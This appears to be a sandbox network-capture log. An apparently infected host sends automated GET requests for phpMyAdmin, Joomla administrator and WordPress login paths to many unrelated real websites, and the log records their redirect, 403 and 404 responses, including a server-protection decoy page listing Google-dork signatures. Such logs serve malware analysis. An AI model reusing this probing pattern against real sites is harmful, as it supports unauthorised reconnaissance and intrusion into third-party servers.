Feb 21, 2024 00:26:11.899676085 CET	457	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/phpmyadmin/ Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.6	60145	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.641268969 CET	167	OUT	GET /pma/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.830049038 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Length: 13681 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:11.830107927 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:11.830121040 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:11.830133915 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:11.830146074 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:11.830177069 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:11.830207109 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:11.830220938 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 70 6d 61 2f 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 54 68 69 73 20 Data Ascii: <h1>Accessing /pma/ securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> </div>
Feb 21, 2024 00:26:11.830233097 CET	1286	IN	Data Raw: 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 Data Ascii: com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/ </a><br><a href='in
Feb 21, 2024 00:26:11.830257893 CET	1286	IN	Data Raw: 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 Data Ascii: s'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This contact form is about
Feb 21, 2024 00:26:11.830401897 CET	1066	IN	Data Raw: 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 31 2e 31 20 2d 20 57 65 62 55 74 69 6c 20 Data Ascii: on 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">GHDB Signature #162

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.6	60373	178.33.253.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.723505974 CET	168	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.895339012 CET	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cfca.eu/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
253	192.168.2.6	59300	223.29.45.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.738574028 CET	190	OUT	GET /administrator/ HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.011862040 CET	463	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/administrator/ Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:13.313374996 CET	199	OUT	GET /administrator/index.php HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.585592031 CET	481	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/administrator/index.php Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.6	60381	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.741492033 CET	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.920778990 CET	459	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/phpmyadmin/ Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.6	60378	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.742742062 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.925296068 CET	533	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/phpMyAdmin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.6	60530	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.763463974 CET	169	OUT	GET /pma/ HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.876838923 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471571.8041474576110125755 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrb3eKb2faxipHpDHW1Enb5/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalqL0nQnEA3y75sfTMFFEpDD5YDxchWjcpg+/I0IXVGKaCBKpq3nPY1N6rHRwSWtdlw==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,HFwuyehutl8tT21go4rzKQuGWFn2wMQWjizQyxww5Ro=,/j+AjfLiOiE0Vc9NsP8sK3wn3HKfNyHsngqdvH35wynwHI026nY8X82AVI4uc6ntz725C8t8ZYCuhGMAdFHN2Q== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 67 cf 69 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 75 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 29 e7 8c 71 7e 79 72 92 9d 96 b6 08 9b 06 58 15 6a 7d 89 67 ce 4f 18 7e e8 36 23 1a 33 4b 2e 9b 26 8f 56 6a 7d ed 9c 75 bf cb 25 f8 b7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 35 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 53 46 05 25 35 f7 85 d4 90 a7 67 ac 96 6b 55 b7 f5 7f 84 d6 83 eb 4e 72 8e 2f 8c 45 7d 5b 45 45 25 9d 07 14 dc 86 05 3f df bb a8 42 68 38 7c 6e d5 7d 1e fd c5 df bf e5 57 b6 6e 64 50 28 61 cf 9c 9b eb 1c ca 25 f4 7c 41 05 0d 04 72 ae 4c 99 47 71 83 f0 3e 75 c4 98 fd c3 82 93 c6 6b 19 f0 71 26 3a ea b7 70 4b f0 85 53 4d 50 d6 ec a9 d8 b3 e9 08 af 1c 70 39 3b b7 c1 ef c9 35 16 ad 84 f5 19 33 76 61 b5 b6 ab 9e 65 17 50 0a 5d a6 95 b9 63 14 d4 3c 52 35 c2 11 8d 59 46 ac 72 b0 c8 23 21 56 ab 55 82 b1 4c 0a 5b 8b 85 c4 90 58 93 e0 57 c4 1c e8 3c f2 15 86 ae 68 03 23 fa 81 f0 5e f4 56 92 0f e8 da 22 69 a4 93 3e 58 87 9a 3a a1 18 37 0a b4 17 a1 52 ae e4 78 1d 36 62 81 b9 e0 c5 af a0 ef 01 79 64 77 7e 27 0b e4 f0 88 af 57 1d 36 1a 7c 05 80 a9 d3 5b 1f 60 1d 44 f7 40 74 6e df 83 d9 5b 72 c0 f7 54 d3 d0 01 bc 69 e7 5a 15 22 4d 66 e9 9b 64 24 7c a7 5e 00 e5 38 1a 8d 49 3e 90 3a 13 1f ea cf 44 9f f9 d9 dc 96 1b a6 a5 59 e6 11 60 fc Data Ascii: 443Vo6_E-gi&0l((Z:[L(R%F}w9ul7c)q~yrXj}gO~6#3K.&Vj}u%M%jYC+X50XP%xw8SF%5gkUNr/E}[EE%?Bh8\|n}WndP(a%\|ArLGq>ukq&:pKSMPp9;53vaeP]c<R5YFr#!VUL[XW<h#^V"i>X:7Rx6bydw~'W6\|[`D@tn[rTiZ"Mfd$\|^8I>:DY`
Feb 21, 2024 00:26:11.876856089 CET	628	IN	Data Raw: 31 8d 28 e9 1d 86 06 5c 1e ed ea e5 6a 47 64 d2 b3 4e 05 95 d1 55 70 1a 83 ab a5 f7 c8 bf 53 4c f5 d6 cb ea 6f be c4 1e 50 6c 29 dd 86 cf 65 71 b7 74 b6 35 65 7c c1 94 ff 73 7b f1 f3 8e fe 15 6d 25 4f 7d 50 0b a6 03 bb b9 66 6f 3e 22 a5 cf 52 e6 Data Ascii: 1(\jGdNUpSLoPl)eqt5e\|s{m%O}Pfo>"R]AIpLOT-I~Z=^y+(%Vs/n?6tc2O?)c\0(>`8%?g.#q2>IhTR1^]8'Nc]X-w-

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.6	60604	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.820328951 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
